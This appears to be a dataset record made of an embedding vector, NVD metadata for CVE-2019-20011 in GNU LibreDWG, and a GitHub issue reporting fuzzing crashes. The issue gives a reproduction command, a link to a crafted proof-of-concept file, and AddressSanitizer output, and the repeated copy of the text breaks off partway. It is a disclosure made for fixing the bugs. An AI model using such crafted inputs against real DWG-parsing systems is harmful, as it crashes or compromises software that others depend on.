-0.0020298496820032597, 0.012854736298322678, -0.017789825797080994, -0.016097795218229294, -0.026132479310035706, 0.0047000860795378685, 0.02923453599214554, 0.015604286454617977, 0.005161282140761614, -0.015545535832643509, -0.00831327773630619, -0.008853787556290627, -0.012314226478338242, -0.05668304115533829, -0.0022589790169149637, -0.011556337587535381, -0.014029758051037788, -0.017261067405343056, 0.01949360780417919, 0.004444519057869911, -0.011926469393074512, -0.00886553805321455, 0.017002562060952187, 0.00460314704105258, 0.018107082694768906, 0.02035137452185154, -0.015592535957694054, -0.009406047873198986, 0.001349071622826159, -0.0022824793122708797, -0.004197764676064253, -0.012290725484490395, -0.0011338958283886313, 0.003157870378345251, -0.0074143861420452595, 0.01722581684589386, 0.016062544658780098, 0.01883559674024582, 0.004423956386744976, 0.021984653547406197, 0.004726524464786053, -0.0066506220027804375, -0.039997734129428864, -0.0004780869057867676, -0.0028229893650859594, 0.0019226290751248598, -0.011086328886449337, -0.01782507821917534, -0.0018433150835335255, -0.009958308190107346, -0.008724534884095192, 0.008677534759044647, -0.01132133323699236, -0.00422420259565115, 0.006556620355695486, 0.0022163845133036375, -0.01060456968843937, -0.0013615562347695231, 0.010827823542058468, -0.0030903066508471966, 0.0003541588375810534, -0.012443478219211102, -0.01662655547261238, -0.0006212926818989217, 0.009065291844308376, -0.026649489998817444, 0.01569828763604164, -0.001902066171169281, -0.00987605657428503, 0.014088508673012257, 0.0006084408378228545, -0.0028567712288349867, -0.012607981450855732, -0.015898041427135468, 0.019540607929229736, -0.009934807196259499, -0.035415150225162506, -0.017531322315335274, 0.004473894834518433, 0.005516726523637772, 0.0019784425385296345, -0.013136740773916245, -0.0014232448302209377, -0.014640768989920616, 0.014582017436623573, 0.011368333362042904, -0.017155315726995468, 0.012960487976670265, 0.0049057151190936565, -0.016943810507655144, 0.013171992264688015, 0.015757039189338684, 0.0006741686374880373, -0.010827823542058468, 0.022360660135746002, -0.026978494599461555, -0.0013872598065063357, -0.013630250468850136, -0.01797783002257347, 0.009864306077361107, -0.015604286454617977, -0.005707667209208012, -0.012220224365592003, 0.03167858347296715, -0.018541840836405754, -0.000014320575246529188, -0.00784914381802082, 0.0022736666724085808, -0.004794088192284107, 0.027824511751532555, 0.009200419299304485, -0.0035280021838843822, -0.02177315019071102, 0.00472946185618639, -0.011127454228699207, -0.0005471194162964821, 0.0018110020318999887, -0.01195584423840046, -0.007737516891211271, -0.004911590367555618, -0.009030040353536606, -0.028764527291059494, 0.000697301875334233, -0.0190000981092453, -0.027425004169344902, -0.004418081138283014, -0.015052026137709618, 0.01292523741722107, 0.0065859961323440075, 0.002652611117810011, 0.004089075140655041, -0.035344649106264114, 0.023770686239004135, -0.017437320202589035, 0.02059812843799591, -0.012396477162837982, -0.00015513956896029413, 0.012725483626127243, 0.013136740773916245, -0.014311762526631355, -0.0004086871922481805, 0.00988780613988638, 0.0007644984289072454, 0.012760734185576439, -0.00009358863462693989, 0.0035750032402575016, -0.0008959539700299501, 0.02441694773733616, -0.0016509053530171514, 0.02093888446688652, -0.008548282086849213, 0.002430825959891081, 0.016438551247119904, 0.003019805531948805, 0.0011889749439433217, -0.006333366502076387, -0.003525064792484045, 0.01068094652146101, 0.013653750531375408, -0.018024830147624016, 0.012243724428117275, 0.001959348563104868, -0.029916049912571907, -0.001586279133334756, 0.024369947612285614, 0.025991477072238922, 0.007508387789130211, -0.004127263091504574, 0.001824220991693437, -0.0038276328705251217, -0.000522884598467499, -0.031091071665287018, 0.0009958307491615415, 0.01270198356360197, 0.010504692792892456, 0.005214158445596695, -0.0036220040637999773, 0.01388875488191843, -0.0055343518033623695, 0.021162139251828194, -0.0007123568211682141, 0.006345116533339024, -0.0010861605405807495, -0.0007997490465641022, 0.010598694905638695, 0.027307501062750816, 0.01579228974878788, 0.0063627418130636215, -0.017190566286444664, -0.02391168847680092, -0.0022795419208705425, 0.02035137452185154, 0.004550271201878786, -0.005836919881403446, -0.003013930283486843, 0.012854736298322678, -0.006074861623346806, 0.01620354689657688, 0.00021829697652719915, -0.01681455783545971, -0.011450584977865219, -0.015193029306828976, 0.013583249412477016, -0.00476765027269721, 0.015357531607151031, 0.005102531053125858, -0.002040131250396371, 0.009335546754300594, 0.017684074118733406, -0.005205345805734396, -0.0015319343656301498, -0.003125557443127036, -0.00679749995470047, 0.007343885023146868, -0.02136189304292202, -0.006591870915144682, -0.000637082033790648, 0.004523833282291889, 0.003263622522354126, -0.016062544658780098, -0.006950252689421177, 0.0017551884520798922, 0.013453996740281582, -0.01679105870425701, 0.0028714588843286037, 0.013759502209722996, 0.02120913937687874, 0.025121960788965225, -0.011086328886449337, -0.014864022843539715, -0.004171326756477356, 0.010022933594882488, 0.006368617061525583, -0.01968161202967167, -0.004071449860930443, -0.02042187564074993, 0.002009286778047681, 0.009823180735111237, 0.025450967252254486, 0.0020357249304652214, 0.00241613807156682, 0.016579555347561836, -0.014852272346615791, -0.007443761453032494, -0.003416375257074833, -0.004209514707326889, -0.015569035895168781, 0.020398374646902084, -0.01051056757569313, -0.008812662214040756, -0.0005210486124269664, -0.015016775578260422, -0.0034868766088038683, -0.0068738763220608234, 0.015745289623737335, -0.015651287510991096, 0.025027958676218987, 0.015381032600998878, 0.01152108609676361, -0.021655647084116936, -0.004970341455191374, 0.027566006407141685, -0.01126845646649599, -0.02523946389555931, -0.01949360780417919, 0.019552359357476234, 0.0130897406488657, -0.02455795183777809, 0.019881365820765495, -0.0022677916567772627, 0.0060131726786494255, 0.018530089408159256, -0.01588629186153412, 0.0236414335668087, 0.004265328403562307, -0.009682177565991879, -0.008066522888839245, -0.00890666339546442, -0.010334314778447151, 0.01545153371989727, -0.022842420265078545, -0.01612129621207714, 0.008589407429099083, 0.0354621522128582, 0.01892959699034691, 0.010780822485685349, -0.021561644971370697, 0.0022707292810082436, 0.015369282104074955, -0.026108980178833008, 0.01975211314857006, 0.014217761345207691, 0.0003657254565041512, 0.022442912682890892, -0.0005911827320232987, -0.00996418297290802, 0.014018007554113865, 0.006198238581418991, -0.008718660101294518, 0.004059699364006519, 0.029916049912571907, -0.0034986266400665045, -0.0038599458057433367, 0.02481645531952381, -0.005860419943928719, -0.0026012039743363857, 0.01637980155646801, 0.008372028358280659, -0.0059661720879375935, -0.025309965014457703, 0.010240312665700912, 0.01790732890367508, -0.007919645868241787, -0.01241997815668583, -0.018001331016421318, -0.036002662032842636, 0.0021473518572747707, -0.0022516350727528334, -0.01287823636084795, -0.00023133237846195698, 0.015087276697158813, 0.007954896427690983, -0.02667298913002014, 0.0147817712277174, 0.010733822360634804, 0.036026161164045334, 0.01613304577767849, -0.026296982541680336, 0.0017625323962420225, 0.01605079509317875, -0.0010149248410016298, 0.025779973715543747, -0.020539376884698868, 0.0455908365547657, 0.01026381365954876, 0.03485114127397537, -0.005998485255986452, -0.007150006480515003, -0.012220224365592003, 0.011885343119502068, -0.018953097984194756, -0.006838625762611628, -0.006033735815435648, -0.0016274048248305917, 0.01578054018318653, -0.001643561408855021, -0.008924288675189018, 0.0015583724016323686, 0.016990812495350838, -0.009129917249083519, -0.013571498915553093, -0.010357814840972424, 0.006204113829880953, 0.03243059664964676, -0.00890666339546442, -0.008043022826313972, -0.015134277753531933, -0.007819768972694874, 0.023794187232851982, -0.01688506081700325, 0.015075527131557465, -0.008178150281310081, -0.0047882129438221455, -0.017543071880936623, 0.015146028250455856, 0.013101490214467049, -0.010816073976457119, -0.01195584423840046, -0.010181562043726444, 0.024052690714597702, 0.011515211313962936, -0.012102722190320492, -0.001268288935534656, -0.015439783222973347, -0.004717711824923754, 0.003536815056577325, -0.0017904391279444098, -0.00688562635332346, 0.0020269122906029224, 0.0002575867692939937, -0.009993558749556541, -0.013465747237205505, 0.005493225995451212, 0.018024830147624016, -0.015898041427135468, -0.009829055517911911, -0.004841088782995939, 0.008319152519106865, -0.02171439863741398, -0.0001331079110968858, 0.00784914381802082, 0.021009385585784912, 0.014711270108819008, 0.01528703048825264, 0.022184407338500023, -0.005516726523637772, 0.011767840944230556, 0.007878519594669342, 0.011350708082318306, 0.013630250468850136, 0.012055721133947372, 0.006527245044708252, 0.004309391602873802, 0.0000857857521623373, -0.005916233640164137, 0.00244698254391551, 0.016097795218229294, 0.015322281047701836, -0.0016538428608328104, -0.003642566967755556, 0.008836162276566029, 0.02204340510070324, -0.007061879616230726, -0.009764429181814194, 0.003290060441941023, -0.009488299489021301, 0.015851041302084923, 0.014358763583004475, 0.024369947612285614, 0.0025233589112758636, -0.013230742886662483, -0.012102722190320492, -0.007449636701494455, 0.004782337695360184, -0.00861290842294693, -0.0033018107060343027, 0.0005052592605352402, 0.01136245857924223, -0.004876339342445135, 0.0308090653270483, 0.0020606941543519497, -0.018353836610913277, -0.0002695205621421337, -0.021749649196863174, -0.013677251525223255, 0.01662655547261238, -0.007238132879137993, -0.006397992372512817, 0.012995738536119461, -0.012220224365592003, -0.010434191673994064, -0.006527245044708252, 0.003008055267855525, 0.01654430292546749, 0.02624998241662979, -0.037036679685115814, -0.01925860345363617, -0.008019521832466125, 0.007349759805947542, 0.00044357063597999513, 0.008530656807124615, 0.0007064817473292351, -0.002157633425667882, 0.0069032516330480576, 0.0033253110013902187, 0.009981808252632618, 0.0003062399919144809, 0.019470106810331345, 0.016238797456026077, 0.003906946629285812, 0.023547431454062462, 0.032054588198661804, 0.009171043522655964, 0.01021681260317564, -0.012807735241949558, 0.01857709139585495, -0.014159009791910648, -0.008924288675189018, -0.024534450843930244, 0.011380083858966827, 0.0011977875838056207, -0.01405325811356306, 0.0035191895440220833, -0.011027577333152294, 0.01681455783545971, 0.021479394286870956, 0.020727381110191345, -0.00420070206746459, 0.024369947612285614, -0.009646927006542683, 0.011338958516716957, 0.01755482144653797, 0.03219559043645859, -0.001856534043326974, 0.00021278906206134707, -0.01842433772981167, 0.016485553234815598, 0.014170760288834572, -0.01473477017134428, 0.012795984745025635, 0.0036249414552003145, -0.0007097864872775972, 0.020151620730757713, -0.017366819083690643, 0.006944377440959215, 0.0011830998118966818, 0.005681229289621115, 0.03586165979504585, -0.015439783222973347, -0.013277743943035603, 0.008289777673780918, 0.020915383473038673, -0.009329671040177345, 0.014981525018811226, -0.021655647084116936, 0.014852272346615791, -0.011914718896150589, 0.01132133323699236, -0.004183076787739992, -0.017272816970944405, 0.011803091503679752, 0.004127263091504574, -0.0011750215198844671, 0.0017801576759666204, 0.02923453599214554, -0.002253103768453002, 0.002031318610534072, 0.004987966734915972, -0.006474368739873171, -0.0010134561453014612, -0.006791624706238508, -0.000513704726472497, 0.017519570887088776, -0.002433763351291418, 0.0039686355739831924, 0.0023882314562797546, 0.009094666689634323, -0.004823463503271341, 0.0130897406488657, 0.015992043539881706, 0.03268910199403763, 0.008031272329390049, -0.000622027029749006, 0.009834930300712585, 0.0004380627360660583, 0.01046944223344326, 0.002088600769639015, 0.015263530425727367, -0.002726050093770027, 0.006327491253614426, 0.005228845868259668, -0.008513031527400017, -0.017449069768190384, 0.03200758621096611, -0.0008291245903819799, -0.002154695801436901, 0.01198522001504898, 0.037036679685115814, 0.010939450934529305, 0.0380001962184906, 0.004526770673692226, -0.018259834498167038, 0.0044122058898210526, -0.013254242949187756, 0.007996021769940853, 0.004197764676064253, -0.014511516317725182, -0.007443761453032494, -0.0016244673170149326, -0.004297641571611166, 0.005475600715726614, 0.002109163673594594, -0.00006242302333703265, 0.00544916233047843, -0.01766057498753071, -0.007690516300499439, -0.0005966906319372356, 0.0147817712277174, 0.004529708065092564, -0.018459588289260864, -0.008184025064110756, -0.028341520577669144, 0.00024271539587061852, 0.025709472596645355, 0.0010318157728761435, 0.0014430733863264322, -0.006562495604157448, -0.014711270108819008, 0.014335263520479202, -0.05287596955895424, 0.03586165979504585, -0.0011581305880099535, 0.010487067513167858, -0.021420642733573914, -0.005299347452819347, -0.009840806014835835, 0.014875773340463638, -0.012408227659761906, -0.0025409841910004616, -0.011902968399226665, 0.006115987431257963, -0.020304372534155846, -0.0016699994448572397, 0.009605801664292812, -0.006397992372512817, -0.013606749475002289, 0.010105185210704803, 0.0031196821946650743, 0.011233205907046795, -0.0039980108849704266, 0.005387473851442337, -0.002824458060786128, -0.010651570744812489, -0.013348245061933994, -0.004479769617319107, -0.0021165076177567244, 0.006715248338878155, -0.007702266331762075, -0.02643798477947712, -0.027824511751532555, 0.015663037076592445, 0.020797882229089737, 0.00677399942651391, -0.031960587948560715, 0.0010406285291537642, 0.0036249414552003145, 0.007167631760239601, -0.0012374445796012878, 0.01177959144115448, 0.011051078327000141, 0.0190000981092453, 0.005531413946300745, -0.015510284341871738, 0.027495505288243294, 0.011932344175875187, 0.002517483662813902, 0.019105851650238037, -0.028153516352176666, -0.018941348418593407, -0.005974984727799892, -0.0006260661757551134, 0.008883163332939148, 0.022583914920687675, 0.0005775965400971472, -0.010228563100099564, 0.004955653566867113, 0.00344281317666173, 0.005422724410891533, -0.003307685721665621, 0.019987117499113083, -0.006550745107233524, 0.01093357615172863, 0.011532836593687534, -0.00810177344828844, -0.013559749349951744, 0.000558869622182101, -0.022607415914535522, 0.012002845294773579, -0.00457964651286602, 0.005587227642536163, 0.0013417277950793505, -0.006715248338878155, 0.021126888692378998, 0.007913770154118538, 0.0017816264880821109, 0.03245409578084946, 0.0035838158801198006, 0.0019270353950560093, -0.007003128528594971, -0.016614805907011032, -0.004567896481603384, -0.01882384531199932, -0.008836162276566029, -0.014511516317725182, 0.007784517947584391, -0.040984753519296646, -0.006791624706238508, 0.020586378872394562, -0.019810862839221954, -0.02220790833234787, -0.01774282567203045, 0.020656879991292953, -0.007526013068854809, 0.004462144337594509, 0.003131432458758354, -0.0026158918626606464, 0.015216529369354248, -0.02261916548013687, 0.016603054478764534, 0.02465195208787918, -0.008066522888839245, 0.0022692603524774313, 0.012337726540863514, 0.005305222235620022, -0.004802900832146406, 0.0025923913344740868, -0.024440448731184006, -0.024346446618437767, -0.0070560043677687645, 0.003560315351933241, -0.004664835520088673, 0.0043652052991092205, -0.008777410723268986, 0.020656879991292953, 0.0038805087096989155, 0.01807183213531971, 0.0025380465667694807, 0.007314509246498346, 0.02253691293299198, 0.0037747567985206842, 0.0014504172140732408, -0.026155980303883553, -0.02650848589837551, -0.00586629519239068, -0.01333649456501007, -0.006591870915144682, -0.0040244488045573235, 0.039480723440647125, 0.012596230953931808, -0.016003793105483055, 0.01343049667775631, -0.01444101519882679, -0.015345782041549683, -0.009975933469831944, -0.0025468592066317797, 0.009893681854009628, -0.002571828430518508, -0.012443478219211102, -0.004673648159950972, 0.014546766877174377, -0.01283123530447483, -0.004368142690509558, -0.015075527131557465, -0.005839857272803783, -0.0058868578635156155, -0.0008166399784386158, 0.0071441312320530415, -0.004191889427602291, 0.002493983367457986, 0.01143883541226387, 0.009341421537101269, -0.022677917033433914, 0.000253914826316759, 0.006826875265687704, 0.017178814858198166, 0.0019240977708250284, -0.03217209130525589, 0.021914152428507805, -0.012913486920297146, 0.013348245061933994, -0.0043652052991092205, -0.004136075731366873, 0.02357093244791031, -0.01756657287478447, 0.008871412836015224, -0.022830668836832047, -0.016497302800416946, 0.012960487976670265, 0.003439875552430749, 0.0003572799905668944, -0.028435522690415382, 0.0032224967144429684, -0.002589453710243106, 0.02256041392683983, -0.0010494411690160632, -0.005839857272803783, 0.006427368149161339, -0.010710321366786957, 0.003234246978536248, -0.01934085600078106, -0.0014981525018811226, -0.019951866939663887, -0.020703880116343498, 0.011156830005347729, 0.0028758652042597532, 0.0000029203417852841085, 0.020809631794691086, -0.017002562060952187, -0.025991477072238922, 0.008800911717116833, 0.006715248338878155, -0.028318019583821297, 0.02643798477947712, 0.012737234123051167, 0.017613572999835014, -0.00810764916241169, 0.003657254623249173, 0.0016215298091992736, -0.006950252689421177, -0.006679997779428959, 0.002040131250396371, -0.01562778651714325, -0.01975211314857006, -0.0040156361646950245, -0.004083199892193079, -0.0057252924889326096, 0.00305211846716702, 0.0068621258251369, 0.01528703048825264, 0.0060924869030714035, -0.012983988039195538, -0.004447456449270248, 0.01060456968843937, -0.01764882355928421, -0.008495406247675419, -0.024346446618437767, 0.017084814608097076, 0.017460821196436882, 0.028341520577669144, 0.013019238598644733, -0.007678765803575516, -0.0009032978559844196, -0.018353836610913277, 0.005302284844219685, 0.012502229772508144, -0.0047794003039598465, 0.0013483372749760747, 0.017249315977096558, 0.009270920418202877, -0.024346446618437767, -0.003413437632843852, 0.01763707399368286, 0.00017074531933758408, -0.007455511949956417, -0.010281438939273357, 0.0029302099719643593, 0.014887522906064987, 0.017954329028725624, 0.019646361470222473, -0.006491994019597769, 0.0010523786768317223, 0.013630250468850136, 0.010551693849265575, -0.004447456449270248, 0.018635842949151993, 0.00204894389025867, 0.008642283268272877, 0.006415617652237415, -0.005690041929483414, 0.017214065417647362, 0.009188668802380562, -0.0006051360978744924, 0.0003205605607945472, -0.00878916122019291, 0.01739032007753849, 0.013677251525223255, 0.021632147952914238, -0.005781106185168028, -0.0028318020049482584, -0.005043779965490103, 0.018530089408159256, -0.012889986857771873, 0.010551693849265575, 0.0095059247687459, 0.03130257502198219, -0.001189709291793406, -0.0008592345402576029, -0.02077438123524189, 0.05174795165657997, -0.00916516873985529, -0.008424905128777027, -0.02077438123524189, 0.018095333129167557, -0.007631765212863684, 0.0023338866885751486, -0.021514644846320152, -0.0053375354036688805, 0.01580403931438923, 0.014546766877174377, 0.02238416112959385, -0.005413911771029234, -0.0002665830252226442, 0.018459588289260864, -0.01985786482691765, 0.01016981154680252, -0.002709893509745598, 0.01924685388803482, 0.03048005886375904, -0.0001242952566826716, 0.012055721133947372, 0.01359499990940094, 0.012889986857771873, -0.013077990151941776, -0.00853653158992529, 0.010404815897345543, 0.013994506560266018, -0.004435706418007612, -0.005654791370034218, -0.028905531391501427, -0.020903633907437325, -0.002019568346440792, 0.025145461782813072, 0.007426136173307896, -0.0003205605607945472, 0.005772293545305729, 0.017543071880936623, 0.0035191895440220833, 0.007443761453032494, -0.009382546879351139, -0.016955561935901642, 0.014887522906064987, 0.015251779928803444, 0.0021062262821942568, -0.020574627444148064, -0.011027577333152294, 0.006374491844326258, -0.009688053280115128, -0.014934523962438107, 0.009840806014835835, 0.0051935953088104725, 0.001120676868595183, -0.024628452956676483, 0.004908652510493994, -0.004450394306331873, -0.0075318883173167706, 0.029446041211485863, -0.022501662373542786, 0.01017568726092577, -0.03311210870742798, 0.0026012039743363857, 0.012267225421965122 ]
3,010
CVE-2019-20011
2019-12-27T01:15:13.383000
An issue was discovered in GNU LibreDWG 0.92. There is a heap-based buffer over-read in decode_R13_R2000 in decode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643439" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6967607-F26E-477A-8D60-8B0D55594EC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643439
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 